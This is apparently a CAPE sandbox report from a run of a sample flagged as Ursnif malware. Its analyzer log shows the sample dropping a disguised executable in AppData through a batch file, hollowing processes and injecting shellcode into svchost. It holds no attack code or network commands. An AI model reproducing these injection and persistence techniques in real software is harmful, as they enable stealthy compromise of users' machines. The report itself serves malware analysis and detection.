CAPE

Detections: Ursnif
Triggered CAPE Tasks: Task #131470: Ursnif

Analysis

Category: FILE
Package: Injection
Started: 2020-03-24 09:47:01
Completed: 2020-03-24 09:50:48
Duration: 227 seconds

Options:
route = internet
procdump = 0

Log:
2020-03-24 09:47:05,000 [root] INFO: Date set to: 03-24-20, time set to: 09:47:05, timeout set to: 200
2020-03-24 09:47:05,030 [root] DEBUG: Starting analyzer from: C:\xkrjyge
2020-03-24 09:47:05,030 [root] DEBUG: Storing results at: C:\gGNnZRIY
2020-03-24 09:47:05,030 [root] DEBUG: Pipe server name: \\.\PIPE\PgWoVOst
2020-03-24 09:47:05,030 [root] INFO: Analysis package "Injection" has been specified.
2020-03-24 09:47:06,325 [root] DEBUG: Started auxiliary module Browser
2020-03-24 09:47:06,341 [root] DEBUG: Started auxiliary module Curtain
2020-03-24 09:47:06,341 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-03-24 09:47:07,510 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-03-24 09:47:07,510 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-03-24 09:47:07,526 [root] DEBUG: Started auxiliary module DigiSig
2020-03-24 09:47:07,526 [root] DEBUG: Started auxiliary module Disguise
2020-03-24 09:47:07,526 [root] DEBUG: Started auxiliary module Human
2020-03-24 09:47:07,526 [root] DEBUG: Started auxiliary module Screenshots
2020-03-24 09:47:07,526 [root] DEBUG: Started auxiliary module Sysmon
2020-03-24 09:47:07,605 [root] DEBUG: Started auxiliary module Usage
2020-03-24 09:47:07,605 [root] INFO: Analyzer: DLL set to Injection.dll from package modules.packages.Injection
2020-03-24 09:47:07,605 [root] INFO: Analyzer: DLL_64 set to Injection_x64.dll from package modules.packages.Injection
2020-03-24 09:47:07,635 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe" with arguments "" with pid 3064
2020-03-24 09:47:07,635 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:07,635 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:07,651 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:07,667 [root] DEBUG: Loader: Injecting process 3064 (thread 872) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:07,667 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:07,667 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:07,667 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:07,667 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:07,667 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3064
2020-03-24 09:47:09,680 [lib.api.process] INFO: Successfully resumed process with pid 3064
2020-03-24 09:47:09,680 [root] INFO: Added new process to list with pid: 3064
2020-03-24 09:47:09,881 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:09,898 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:10,023 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:10,023 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:10,023 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:10,023 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:10,023 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:10,023 [root] DEBUG: CAPE initialised: 32-bit Injection package loaded in process 3064 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:47:10,038 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe".
2020-03-24 09:47:10,038 [root] INFO: Monitor successfully loaded in process with pid 3064.
2020-03-24 09:47:10,085 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xc4 amd local view 0x035F0000 to global list ().
2020-03-24 09:47:10,148 [root] DEBUG: DLL loaded at 0x74780000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:47:10,413 [root] DEBUG: set_caller_info: Adding region at 0x004D0000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:47:10,460 [root] DEBUG: set_caller_info: Adding region at 0x00230000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:47:10,584 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:47:10,584 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:47:10,584 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:47:10,584 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:47:10,631 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:47:10,631 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 3064, handle 0x100.
2020-03-24 09:47:10,631 [root] DEBUG: OpenProcessHandler: Image base for process 3064 (handle 0x100): 0x00400000.
2020-03-24 09:47:21,769 [root] DEBUG: DLL loaded at 0x76DD0000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:47:21,769 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 1708, handle 0x104.
2020-03-24 09:47:21,815 [root] DEBUG: ResumeThreadHandler: Dumping hollowed process 3064, image base 0x00400000.
2020-03-24 09:47:21,832 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:21,832 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:21,832 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\3064_6435005442171924232020
2020-03-24 09:47:21,848 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:47:21,848 [root] DEBUG: ResumeThreadHandler: Dumped PE image from buffer.
2020-03-24 09:47:21,848 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 3064.
2020-03-24 09:47:21,848 [root] DEBUG: DumpSectionViewsForPid: no shared section views found for pid 3064.
2020-03-24 09:47:21,940 [root] DEBUG: DLL loaded at 0x74680000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-03-24 09:47:21,940 [root] DEBUG: DLL loaded at 0x744E0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2020-03-24 09:47:21,940 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-03-24 09:47:22,035 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-03-24 09:47:22,065 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-03-24 09:47:22,112 [root] DEBUG: DLL unloaded from 0x75B20000.
2020-03-24 09:47:22,112 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:22,331 [root] DEBUG: DLL loaded at 0x74470000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2020-03-24 09:47:22,517 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2020-03-24 09:47:22,829 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2020-03-24 09:47:22,877 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2020-03-24 09:47:23,470 [root] INFO: Announced 32-bit process name: cmd.exe pid: 1016
2020-03-24 09:47:23,470 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:23,470 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:23,486 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:23,486 [root] DEBUG: Loader: Injecting process 1016 (thread 3036) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,486 [root] DEBUG: Process image base: 0x4A4F0000
2020-03-24 09:47:23,486 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,486 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:23,486 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,486 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1016
2020-03-24 09:47:23,486 [root] DEBUG: CreateProcessHandler: using lpCommandLine: "C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE".
2020-03-24 09:47:23,486 [root] DEBUG: CreateProcessHandler: Injection info set for new process 1016, ImageBase: 0x4A4F0000
2020-03-24 09:47:23,486 [root] INFO: Announced 32-bit process name: cmd.exe pid: 1016
2020-03-24 09:47:23,500 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:23,500 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:23,500 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:23,500 [root] DEBUG: Loader: Injecting process 1016 (thread 3036) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,500 [root] DEBUG: Process image base: 0x4A4F0000
2020-03-24 09:47:23,500 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,516 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:23,516 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,516 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1016
2020-03-24 09:47:23,516 [root] DEBUG: DLL unloaded from 0x75530000.
2020-03-24 09:47:23,532 [root] DEBUG: DLL unloaded from 0x75B20000.
2020-03-24 09:47:23,532 [root] DEBUG: DLL unloaded from 0x74470000.
2020-03-24 09:47:23,532 [root] DEBUG: DLL unloaded from 0x74680000.
2020-03-24 09:47:23,532 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:23,548 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:23,548 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:23,563 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:23,563 [root] DEBUG: CAPE initialised: 32-bit Injection package loaded in process 1016 at 0x747a0000, image base 0x4a4f0000, stack from 0x83000-0x180000
2020-03-24 09:47:23,563 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd \c ""C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"".
2020-03-24 09:47:23,563 [root] INFO: Added new process to list with pid: 1016
2020-03-24 09:47:23,563 [root] INFO: Monitor successfully loaded in process with pid 1016.
2020-03-24 09:47:23,595 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xdc amd local view 0x03C40000 to global list ().
2020-03-24 09:47:23,595 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2888
2020-03-24 09:47:23,609 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:23,609 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:23,609 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:23,609 [root] DEBUG: Loader: Injecting process 2888 (thread 2572) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,609 [root] DEBUG: Process image base: 0x4A4F0000
2020-03-24 09:47:23,609 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,625 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:23,625 [root] DEBUG: DLL unloaded from 0x75700000.
2020-03-24 09:47:23,625 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,625 [root] DEBUG: DLL unloaded from 0x74BB0000.
2020-03-24 09:47:23,625 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2888
2020-03-24 09:47:23,625 [root] INFO: Notified of termination of process with pid 3064.
2020-03-24 09:47:23,625 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:23,734 [root] DEBUG: CreateProcessHandler: Injection info set for new process 2888, ImageBase: 0x4A4F0000
2020-03-24 09:47:23,734 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2888
2020-03-24 09:47:23,750 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:23,750 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:23,782 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:23,798 [root] DEBUG: Loader: Injecting process 2888 (thread 2572) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,798 [root] DEBUG: Process image base: 0x4A4F0000
2020-03-24 09:47:23,812 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,812 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:23,828 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,828 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2888
2020-03-24 09:47:23,844 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:23,859 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:23,875 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:23,875 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:23,891 [root] DEBUG: CAPE initialised: 32-bit Injection package loaded in process 2888 at 0x747a0000, image base 0x4a4f0000, stack from 0x363000-0x460000
2020-03-24 09:47:23,891 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd  \C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"".
2020-03-24 09:47:23,891 [root] INFO: Added new process to list with pid: 2888
2020-03-24 09:47:23,891 [root] INFO: Monitor successfully loaded in process with pid 2888.
2020-03-24 09:47:23,907 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xe0 amd local view 0x03BC0000 to global list ().
2020-03-24 09:47:23,907 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 2980
2020-03-24 09:47:23,937 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:23,937 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:23,953 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:23,984 [root] DEBUG: Loader: Injecting process 2980 (thread 2512) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,016 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:24,016 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,016 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:24,046 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,046 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2980
2020-03-24 09:47:24,062 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:24,094 [root] DEBUG: CreateProcessHandler: Injection info set for new process 2980, ImageBase: 0x00400000
2020-03-24 09:47:24,109 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 2980
2020-03-24 09:47:24,109 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:24,109 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:24,141 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:24,155 [root] DEBUG: Loader: Injecting process 2980 (thread 2512) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,171 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:24,171 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,187 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:24,187 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,187 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2980
2020-03-24 09:47:24,203 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:24,203 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:24,219 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:24,219 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:24,233 [root] DEBUG: CAPE initialised: 32-bit Injection package loaded in process 2980 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:47:24,233 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"  "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE".
2020-03-24 09:47:24,250 [root] INFO: Added new process to list with pid: 2980
2020-03-24 09:47:24,250 [root] INFO: Monitor successfully loaded in process with pid 2980.
2020-03-24 09:47:24,250 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xd0 amd local view 0x035F0000 to global list ().
2020-03-24 09:47:24,250 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:47:24,546 [root] DEBUG: set_caller_info: Adding region at 0x03A80000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:47:24,608 [root] DEBUG: set_caller_info: Adding region at 0x002F0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:47:24,608 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:47:24,640 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:47:24,655 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:47:24,671 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:47:24,671 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:47:24,671 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 2980, handle 0xfc.
2020-03-24 09:47:24,671 [root] DEBUG: OpenProcessHandler: Image base for process 2980 (handle 0xfc): 0x00400000.
2020-03-24 09:48:17,273 [root] DEBUG: DLL loaded at 0x76DD0000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:48:17,273 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 1708, handle 0x100.
2020-03-24 09:48:17,305 [root] DEBUG: ResumeThreadHandler: Dumping hollowed process 2980, image base 0x00400000.
2020-03-24 09:48:17,321 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:48:17,321 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:48:17,321 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_20931482251781924232020
2020-03-24 09:48:17,321 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:48:17,336 [root] DEBUG: ResumeThreadHandler: Dumped PE image from buffer.
2020-03-24 09:48:17,336 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 2980.
2020-03-24 09:48:17,336 [root] DEBUG: DumpSectionViewsForPid: no shared section views found for pid 2980.
2020-03-24 09:48:17,336 [root] INFO: Announced 64-bit process name: svchost.exe pid: 1308
2020-03-24 09:48:17,351 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:48:17,351 [lib.api.process] INFO: 64-bit DLL to inject is C:\xkrjyge\dll\XfVPsKv.dll, loader C:\xkrjyge\bin\ACICoeBS.exe
2020-03-24 09:48:17,368 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:48:17,368 [root] DEBUG: Loader: Injecting process 1308 (thread 3060) with C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,368 [root] DEBUG: Process image base: 0x00000000FF8E0000
2020-03-24 09:48:17,398 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,414 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:48:17,414 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,414 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1308
2020-03-24 09:48:17,414 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:48:17,430 [root] DEBUG: CreateProcessHandler: using lpCommandLine: C:\Windows\system32\svchost.exe.
2020-03-24 09:48:17,446 [root] DEBUG: CreateProcessHandler: Injection info set for new process 1308, ImageBase: 0xFF8E0000
2020-03-24 09:48:17,446 [root] INFO: Announced 64-bit process name: svchost.exe pid: 1308
2020-03-24 09:48:17,446 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:48:17,446 [lib.api.process] INFO: 64-bit DLL to inject is C:\xkrjyge\dll\XfVPsKv.dll, loader C:\xkrjyge\bin\ACICoeBS.exe
2020-03-24 09:48:17,461 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:48:17,476 [root] DEBUG: Loader: Injecting process 1308 (thread 3060) with C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,493 [root] DEBUG: Process image base: 0x00000000FF8E0000
2020-03-24 09:48:17,507 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,507 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:48:17,507 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,507 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1308
2020-03-24 09:48:17,523 [root] DEBUG: ResumeThreadHandler: Dumping hollowed process 1308, image base 0xFF8E0000.
2020-03-24 09:48:17,539 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0xFF8E0000.
2020-03-24 09:48:17,539 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000246C.
2020-03-24 09:48:17,571 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_13548867563781924232020
2020-03-24 09:48:17,601 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6600.
2020-03-24 09:48:17,601 [root] DEBUG: ResumeThreadHandler: Dumped PE image from buffer.
2020-03-24 09:48:17,601 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 1308.
2020-03-24 09:48:17,601 [root] DEBUG: DumpSectionViewsForPid: no shared section views found for pid 1308.
2020-03-24 09:48:17,601 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:48:17,618 [root] DEBUG: Process dumps disabled.
2020-03-24 09:48:17,632 [root] INFO: Disabling sleep skipping.
2020-03-24 09:48:17,648 [root] WARNING: Unable to place hook on LockResource
2020-03-24 09:48:17,664 [root] WARNING: Unable to hook LockResource
2020-03-24 09:48:17,680 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:48:17,696 [root] DEBUG: CAPE initialised: 64-bit Injection package loaded in process 1308 at 0x0000000074660000, image base 0x00000000FF8E0000, stack from 0x0000000000225000-0x0000000000230000
2020-03-24 09:48:17,696 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe.
2020-03-24 09:48:17,696 [root] INFO: Added new process to list with pid: 1308
2020-03-24 09:48:17,696 [root] INFO: Monitor successfully loaded in process with pid 1308.
2020-03-24 09:48:17,742 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x16c amd local view 0x01F30000 to global list ().
2020-03-24 09:48:17,742 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x16c to target process 1308 ().
2020-03-24 09:48:17,757 [root] DEBUG: WriteMemoryHandler: shellcode at 0x043D71B8 (size 0x318) injected into process 1308.
2020-03-24 09:48:17,773 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\gGNnZRIY\CAPE\2980_51891963781924232020
2020-03-24 09:48:17,773 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_51891963781924232020
2020-03-24 09:48:17,789 [root] DEBUG: WriteMemoryHandler: Dumped injected code/data from buffer.
2020-03-24 09:48:17,805 [root] DEBUG: UnmapSectionViewHandler: Attempt to unmap view at 0x01F30000, dumping.
2020-03-24 09:48:17,805 [root] DEBUG: DumpPEsInRange: Scanning range 0x1f30000 - 0x1fe0000.
2020-03-24 09:48:17,805 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1f30000
2020-03-24 09:48:17,819 [root] DEBUG: SetCapeMetaData: Injection type with no PID - error.
2020-03-24 09:48:17,835 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:17,867 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x01F30000.
2020-03-24 09:48:17,867 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001644.
2020-03-24 09:48:17,882 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_12866117363781924232020
2020-03-24 09:48:17,898 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3d000.
2020-03-24 09:48:17,898 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x1f30000.
2020-03-24 09:48:17,914 [root] DEBUG: TestPERequirements: Characteristics bad. (0x1f59e07)
2020-03-24 09:48:17,930 [root] DEBUG: TestPERequirements: FileAlignment invalid. (0x1f59e07)
2020-03-24 09:48:17,960 [root] DEBUG: TestPERequirements: Characteristics bad. (0x1f59d77)
2020-03-24 09:48:17,960 [root] DEBUG: TestPERequirements: FileAlignment invalid. (0x1f59d77)
2020-03-24 09:48:17,976 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1f71b8c
2020-03-24 09:48:17,992 [root] DEBUG: DumpPEsInRange: Disguised PE image (bad MZ and/or PE headers) at 0x1f71b8c.
2020-03-24 09:48:18,007 [root] DEBUG: SetCapeMetaData: Injection type with no PID - error.
2020-03-24 09:48:18,007 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:18,007 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x043E0020.
2020-03-24 09:48:18,007 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001406.
2020-03-24 09:48:18,007 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_575675203881924232020
2020-03-24 09:48:18,007 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x2f400.
2020-03-24 09:48:18,023 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x43e0020.
2020-03-24 09:48:18,069 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1fa1b8c
2020-03-24 09:48:18,085 [root] DEBUG: DumpPEsInRange: Disguised PE image (bad MZ and/or PE headers) at 0x1fa1b8c.
2020-03-24 09:48:18,085 [root] DEBUG: SetCapeMetaData: Injection type with no PID - error.
2020-03-24 09:48:18,101 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
